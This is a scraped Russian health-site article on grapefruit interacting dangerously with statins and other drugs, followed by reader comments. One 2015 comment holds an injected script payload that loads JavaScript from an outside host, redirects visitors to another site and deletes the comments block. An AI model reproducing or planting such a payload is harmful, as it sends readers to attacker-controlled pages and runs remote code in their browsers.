Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Знаете ли вы, какой самый...  >>  Знаете ли вы, какой самый опасный фрукт?
 
Обратная связь
 

Знаете ли вы, какой самый опасный фрукт?

Размер шрифта
14 января 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Кузнецова
Здоровье инфо
  • google_analytics: false
  • Нравится

Последние исследования показывают, что употребление грейпфрута с некоторыми видами лекарств может быть опасно для жизни.

самый опасный фрукт

Список лекарств, которые не следует употреблять вместе с грейпфрутами, включает в себя более 85 лекарств (при том, что еще четыре года назад в этом списке было всего 17 наименований). В него входят такие препараты, как: статины (например, аторвастатин, ловастатин, симвастатин), некоторые антибиотики, противоопухолевые лекарственные средства, сердечные препараты.

Опасная реакция происходит из-за того, что грейпфрут содержит вещества фуранокумарины, которые в несколько раз усиливают эффект лекарственных препаратов.

Они содержатся не только в грейпфрутах, но и в некоторых сортах апельсинов, лаймов и памело. К тому же эти вещества остаются в организме продолжительное время, даже после употребления самих фруктов. Например, один стакан грейпфрутового сока, выпитый за три дня до приема симвастатина, увеличит эффект лекарства на 330%. Это может вызвать опасное для жизни состояние – рабдомиолиз (разрушение клеток мышечной ткани). Поэтому на время приема лекарственных препаратов лучше полностью отказаться от употребления этих цитрусовых.  

«Грейпфрут может негативно взаимодействовать с широким классом лекарств от сердечно-сосудистых до гормональных препаратов», – говорит Тара Нарула, доктор медицинских наук, заместитель директора кардиологической помощи в больнице Ленокс Хилл в Нью-Йорке.

Если вы не уверенны в том, сочетаются ли прописанные вам лекарства, с грейпфрутом, проконсультируйтесь с врачом или фармацевтом. Не забывайте также и о том, что грейпфрут опасен только при употреблении его с лекарствами, а так этот фрукт содержит много витаминов и подходит для диетического питания.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - MariYa

17 января 2013 в 20:49

Цитировать   |   Пожаловаться

Не думала, что есть взаимосвязь с лекарствами. Спасибо за инфу. Учту.

2 - Гость

18 января 2013 в 12:17

Цитировать   |   Пожаловаться

А противосудорожные препараты сюда не относятся ??? 

3 - Лиля

18 января 2013 в 12:27

Цитировать   |   Пожаловаться

Спасибо,очень важная для меня информация.


Гость 18 января 2013 в 12:17
А противосудорожные препараты сюда не относятся ???

Противосудорожные препараты запиваются только водой, как и большинство других. Кислая среда этих и подобных фруктов нарушает правильное всасывание и утилизацию лекарств

5 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Смертельные пары. Лекарства, которые нельзя принимать вместе   Смертельные пары. Какие лекарства нельзя смешивать   Грейпфрут нельзя есть вместе с этими лекарствами!   Фармакодинамика  
11 января 2013Знаете ли вы, какой самый опасный фрукт? 11 марта 2013Свекольный сок снижает давление
 
06 ноября 2012Подростки не могут побороть страх 31 октября 2012Ученые научились стирать память!
 

Слайдшоу

1
Продукты, которые нельзя употреблять с лекарствами
Суперзавтраки
Как провести отпуск без запора

Тесты

Что на вашем столе?
Контрольная по носу
Что вы пьете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.